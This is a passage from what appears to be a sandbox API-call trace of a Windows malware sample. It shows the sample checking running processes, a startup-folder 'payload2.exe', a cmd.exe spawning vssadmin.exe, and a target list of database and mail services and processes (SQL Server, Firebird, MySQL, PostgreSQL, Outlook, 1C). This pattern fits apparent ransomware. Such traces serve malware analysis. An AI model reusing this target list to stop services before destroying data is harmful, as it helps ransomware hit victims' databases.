lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0039.739] lstrlenW (lpString="dllhost.exe") returned 11 [0039.739] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0039.740] lstrlenW (lpString="dllhost.exe") returned 11 [0039.740] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0039.740] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0039.740] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0039.741] lstrlenW (lpString="cmd.exe") returned 7 [0039.903] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0039.904] lstrlenW (lpString="conhost.exe") returned 11 [0039.904] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0039.904] lstrlenW (lpString="vssadmin.exe") returned 12 [0039.905] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0039.905] CloseHandle (hObject=0x1ac) returned 1 [0039.905] Sleep (dwMilliseconds=0x1f4) [0040.614] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6800f8 [0040.614] EnumServicesStatusExW (in: hSCManager=0x6800f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0040.615] GetLastError () returned 0xea [0040.615] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x11e4) returned 0x3f74350 [0040.615] EnumServicesStatusExW (in: hSCManager=0x6800f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f74350, cbBufSize=0x11e4, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f74350, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0040.615] CloseServiceHandle (hSCObject=0x6800f8) returned 1 [0040.616] lstrlenW (lpString="Appinfo") returned 7 [0040.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0040.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0040.616] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0040.616] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0040.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0040.616] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0040.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.616] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0040.616] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0040.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0040.616] lstrlenW (lpString="AudioSrv") returned 8 [0040.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0040.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0040.616] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0040.616] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0040.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0040.616] lstrlenW (lpString="BFE") returned 3 [0040.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0040.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0040.616] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0040.616] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0040.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0040.616] lstrlenW (lpString="CryptSvc") returned 8 [0040.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0040.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0040.616] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0040.616] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0040.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0040.616] lstrlenW (lpString="CscService") returned 10 [0040.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0040.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0040.616] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0040.616] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0040.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0040.617] lstrlenW (lpString="DcomLaunch") returned 10 [0040.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.617] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0040.617] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0040.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0040.617] lstrlenW (lpString="Dhcp") returned 4 [0040.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0040.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0040.617] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0040.617] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0040.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0040.617] lstrlenW (lpString="Dnscache") returned 8 [0040.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0040.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0040.617] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0040.617] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0040.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0040.617] lstrlenW (lpString="DPS") returned 3 [0040.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0040.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0040.617] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0040.617] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0040.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0040.617] lstrlenW (lpString="eventlog") returned 8 [0040.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0040.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0040.617] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0040.617] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0040.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0040.617] lstrlenW (lpString="EventSystem") returned 11 [0040.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0040.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0040.617] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0040.617] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0040.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0040.617] lstrlenW (lpString="gpsvc") returned 5 [0040.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0040.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0040.618] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0040.618] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0040.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0040.618] lstrlenW (lpString="iphlpsvc") returned 8 [0040.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.618] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0040.618] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0040.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0040.618] lstrlenW (lpString="LanmanServer") returned 12 [0040.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0040.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0040.618] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0040.618] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0040.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0040.618] lstrlenW (lpString="LanmanWorkstation") returned 17 [0040.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.618] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0040.618] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0040.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0040.618] lstrlenW (lpString="lmhosts") returned 7 [0040.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0040.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0040.618] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0040.618] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0040.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0040.618] lstrlenW (lpString="MMCSS") returned 5 [0040.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0040.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0040.618] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0040.618] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0040.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0040.618] lstrlenW (lpString="MpsSvc") returned 6 [0040.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0040.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0040.619] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0040.619] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0040.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0040.619] lstrlenW (lpString="Netman") returned 6 [0040.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0040.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0040.619] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0040.619] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0040.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0040.619] lstrlenW (lpString="netprofm") returned 8 [0040.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0040.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0040.619] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0040.619] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0040.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0040.619] lstrlenW (lpString="NlaSvc") returned 6 [0040.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0040.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0040.619] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0040.619] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0040.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0040.619] lstrlenW (lpString="nsi") returned 3 [0040.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0040.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0040.619] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0040.619] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0040.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0040.619] lstrlenW (lpString="PcaSvc") returned 6 [0040.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0040.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0040.619] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0040.619] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0040.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0040.619] lstrlenW (lpString="PlugPlay") returned 8 [0040.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0040.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0040.619] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0040.619] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0040.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0040.620] lstrlenW (lpString="Power") returned 5 [0040.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0040.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0040.620] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0040.620] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0040.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0040.620] lstrlenW (lpString="ProfSvc") returned 7 [0040.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0040.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0040.620] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0040.620] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0040.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0040.620] lstrlenW (lpString="RpcEptMapper") returned 12 [0040.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.620] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0040.620] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0040.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0040.620] lstrlenW (lpString="RpcSs") returned 5 [0040.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0040.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0040.620] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0040.620] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0040.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0040.620] lstrlenW (lpString="SamSs") returned 5 [0040.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0040.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0040.620] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0040.620] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0040.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0040.620] lstrlenW (lpString="Schedule") returned 8 [0040.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0040.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0040.620] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0040.620] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0040.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0040.621] lstrlenW (lpString="SENS") returned 4 [0040.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0040.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0040.621] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0040.621] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0040.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0040.621] lstrlenW (lpString="ShellHWDetection") returned 16 [0040.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.621] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0040.621] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0040.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0040.621] lstrlenW (lpString="Spooler") returned 7 [0040.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0040.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0040.621] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0040.621] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0040.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0040.621] lstrlenW (lpString="SysMain") returned 7 [0040.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0040.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0040.621] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0040.621] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0040.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0040.621] lstrlenW (lpString="Themes") returned 6 [0040.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0040.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0040.621] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0040.621] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0040.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0040.621] lstrlenW (lpString="TrkWks") returned 6 [0040.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0040.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0040.621] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0040.621] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0040.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0040.621] lstrlenW (lpString="UxSms") returned 5 [0040.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0040.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0040.622] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0040.622] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0040.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0040.622] lstrlenW (lpString="WdiServiceHost") returned 14 [0040.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.622] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0040.622] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0040.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0040.622] lstrlenW (lpString="WdiSystemHost") returned 13 [0040.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.622] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0040.622] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0040.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0040.622] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0040.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.622] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0040.622] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0040.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0040.622] lstrlenW (lpString="Winmgmt") returned 7 [0040.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0040.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0040.622] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0040.622] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0040.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0040.622] lstrlenW (lpString="WPDBusEnum") returned 10 [0040.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.622] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0040.622] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0040.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0040.622] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f74350 | out: hHeap=0x600000) returned 1 [0040.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c8 [0040.624] Process32FirstW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0040.625] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0040.625] lstrlenW (lpString="System") returned 6 [0040.625] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0040.625] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0040.625] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0040.626] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0040.626] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0040.626] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0040.626] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0040.626] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0040.626] lstrlenW (lpString="smss.exe") returned 8 [0040.626] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0040.626] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0040.626] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0040.626] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0040.626] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0040.626] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0040.626] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0040.626] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, 